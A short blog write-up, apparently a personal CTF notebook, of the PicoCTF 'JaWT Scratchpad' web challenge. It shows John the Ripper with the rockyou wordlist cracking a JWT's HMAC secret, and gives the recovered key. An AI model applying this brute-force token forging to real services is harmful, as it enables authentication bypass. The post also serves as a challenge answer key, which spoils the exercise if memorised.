PicoCTF - JaWT Scratchpad

Posted on 2024-01-31 | Post modified | In Security/Practice/PicoCTF/Web |

PicoCTF - JaWT Scratchpad

Background

Recon

這一題蠻有趣的，有結合其他東西當作解題的基礎，先看JWT的token，decode過後的結果表示：

也就是說，token只會隨著payload而變動，所以也沒有辦法用解public key的方式重新簽署文件，另外用alg=none也會出現Authentication failed，不過作者有在網頁中有給出提示，用John，看起來就是用john-the-ripper解出token password

Exploit - Brute Force

Brute Force Password

 $ cat jwt.txt
 eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiaGhoIn0.j1yd-PJbjNraLhhBAxZBD2C1EVIyHqlnvKh_l-iVKG8%
 $ ./john.exe ../jwt.txt --wordlist=../rockyou.txt
 Using default input encoding: UTF-8
 Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
 Will run 8 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 ilovepico        (?)
 1g 0:00:00:02 DONE (2023-06-26 18:42) 0.3673g/s 2720Kp/s 2720Kc/s 2720KC/s ilovetitoelbambino..ilovejesus71
 Use the "--show" option to display all of the cracked passwords reliably
 Session completed

Token Password: ilovepico

Check password & Construct New Token
Get Flag

Reference

pico2019 JaWT Scratchpad

Post author: SBK6401
Post link: https://bernie6401.github.io/security/practice/picoctf/web/2024/01/31/PicoCTF-JaWT-Scratchpad/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.